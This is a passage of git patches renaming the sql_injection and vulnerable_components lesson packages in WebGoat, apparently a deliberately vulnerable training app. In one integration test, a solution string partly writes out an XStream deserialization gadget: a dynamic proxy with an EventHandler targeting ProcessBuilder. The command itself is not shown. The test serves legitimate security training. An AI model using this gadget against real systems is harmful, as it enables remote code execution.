rename to src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_de.properties
diff --git a/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_fr.properties b/src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_fr.properties
similarity index 100%
rename from src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_fr.properties
rename to src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_fr.properties
diff --git a/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_ru.properties b/src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_ru.properties
similarity index 100%
rename from src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_ru.properties
rename to src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_ru.properties
diff --git a/src/main/resources/lessons/sql_injection/js/assignment10b.js b/src/main/resources/lessons/sqlinjection/js/assignment10b.js
similarity index 100%
rename from src/main/resources/lessons/sql_injection/js/assignment10b.js
rename to src/main/resources/lessons/sqlinjection/js/assignment10b.js
diff --git a/src/main/resources/lessons/sql_injection/js/assignment13.js b/src/main/resources/lessons/sqlinjection/js/assignment13.js
similarity index 100%
rename from src/main/resources/lessons/sql_injection/js/assignment13.js
rename to src/main/resources/lessons/sqlinjection/js/assignment13.js
diff --git a/src/main/resources/lessons/sql_injection/js/challenge.js b/src/main/resources/lessons/sqlinjection/js/challenge.js
similarity index 100%
rename from src/main/resources/lessons/sql_injection/js/challenge.js
rename to src/main/resources/lessons/sqlinjection/js/challenge.js
diff --git a/src/main/resources/lessons/sql_injection/js/questions_sql_injection.json b/src/main/resources/lessons/sqlinjection/js/questions_sql_injection.json
similarity index 100%
rename from src/main/resources/lessons/sql_injection/js/questions_sql_injection.json
rename to src/main/resources/lessons/sqlinjection/js/questions_sql_injection.json
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
similarity index 92%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
index 7b4ee2076..c14ac348c 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection;
+package org.owasp.webgoat.lessons.sqlinjection;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.sql_injection.introduction.SqlInjection;
+import org.owasp.webgoat.lessons.sqlinjection.introduction.SqlInjection;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
similarity index 96%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
index a2f702eb3..9187aed6c 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
similarity index 93%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
index d6cd74321..010be19f3 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
similarity index 96%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
index 9bae84bea..43f08cbb3 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.AfterEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.LessonDataSource;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
index 1b9f7082a..b08c7c142 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Disabled;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
index d3c2653f1..a9020ee7f 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.hamcrest.Matchers.containsString;
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
similarity index 94%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
index b9d94dbf3..043bc2e23 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
index 721f7ce45..f53768e34 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
similarity index 98%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
index f5b03e1de..baf3c9746 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
index 924bfa4c2..333a93515 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
similarity index 93%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
index f05a5c276..1b71b8a3f 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
similarity index 92%
rename from src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
index 9477fbbaa..323fcb301 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 

From 256c1dd3aa4905642ede26c2c1ac66fef98ba320 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:41:26 +0200
Subject: [PATCH 192/227] Renamed to vulnerablecomponents

---
 .../webgoat/GeneralLessonIntegrationTest.java |   2 +-
 .../Contact.java                              |   2 +-
 .../ContactImpl.java                          |   2 +-
 .../VulnerableComponents.java                 |   2 +-
 .../VulnerableComponentsLesson.java           |   2 +-
 .../VulnerableComponents_content0.adoc        |   0
 .../VulnerableComponents_content1.adoc        |   0
 .../VulnerableComponents_content1a.adoc       |   0
 .../VulnerableComponents_content2.adoc        |   0
 .../VulnerableComponents_content2a.adoc       |   0
 .../VulnerableComponents_content3.adoc        |   0
 .../VulnerableComponents_content4.adoc        |   0
 .../VulnerableComponents_content4a.adoc       |   0
 .../VulnerableComponents_content4b.adoc       |   0
 .../VulnerableComponents_content4c.adoc       |   0
 .../VulnerableComponents_content5.adoc        |   0
 .../VulnerableComponents_content5a.adoc       |   2 +-
 .../VulnerableComponents_content6.adoc        |   0
 .../VulnerableComponents_plan.adoc            |   0
 .../html/VulnerableComponents.html            |  28 +++++++++---------
 .../i18n/WebGoatLabels.properties             |   0
 .../images/OWASP-2013-A9.png                  | Bin
 .../images/OWASP-Dep-Check.png                | Bin
 .../images/Old-Components.png                 | Bin
 .../images/OpenSourceGrowing.png              | Bin
 .../images/Risk-of-Old-Components.png         | Bin
 .../images/WebGoat-Vulns.png                  | Bin
 .../VulnerableComponentsLessonTest.java       |   6 ++--
 28 files changed, 24 insertions(+), 22 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{vulnerable_components => vulnerablecomponents}/Contact.java (95%)
 rename src/main/java/org/owasp/webgoat/lessons/{vulnerable_components => vulnerablecomponents}/ContactImpl.java (95%)
 rename src/main/java/org/owasp/webgoat/lessons/{vulnerable_components => vulnerablecomponents}/VulnerableComponents.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{vulnerable_components => vulnerablecomponents}/VulnerableComponentsLesson.java (98%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content0.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content1.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content1a.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content2.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content2a.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content3.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content4.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content4a.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content4b.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content4c.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content5.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content5a.adoc (95%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_content6.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/documentation/VulnerableComponents_plan.adoc (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/html/VulnerableComponents.html (83%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/OWASP-2013-A9.png (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/OWASP-Dep-Check.png (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/Old-Components.png (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/OpenSourceGrowing.png (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/Risk-of-Old-Components.png (100%)
 rename src/main/resources/lessons/{vulnerable_components => vulnerablecomponents}/images/WebGoat-Vulns.png (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{vulnerable_components => vulnerablecomponents}/VulnerableComponentsLessonTest.java (92%)

diff --git a/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
index 07c9d1dfd..60dfef04d 100644
--- a/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
@@ -65,7 +65,7 @@ public class GeneralLessonIntegrationTest extends IntegrationTest {
     @Test
     public void vulnerableComponents() {
     	String solution = "<contact class='dynamic-proxy'>\n" + 
-    			"<interface>org.owasp.webgoat.lessons.vulnerable_components.Contact</interface>\n" +
+    			"<interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>\n" +
     			"  <handler class='java.beans.EventHandler'>\n" + 
     			"    <target class='java.lang.ProcessBuilder'>\n" + 
     			"      <command>\n" + 
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
similarity index 95%
rename from src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
index 6de35f8ef..4b603b993 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/Contact.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 public interface Contact {
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
similarity index 95%
rename from src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
index 586bad23a..541b18bfb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/ContactImpl.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 import lombok.Data;
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
index 228f74cce..4340d6edf 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponents.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
index c5598c0e6..5487e7e33 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 import com.thoughtworks.xstream.XStream;
 import org.apache.commons.lang3.StringUtils;
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content0.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content0.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content1.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content1.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content1a.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content1a.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content2.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content2.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content2a.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content2a.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content3.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content3.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4a.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4a.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4b.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4b.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4c.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content4c.adoc
diff --git a/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5.adoc
similarity index 100%
rename from src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc
rename to src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5.adoc
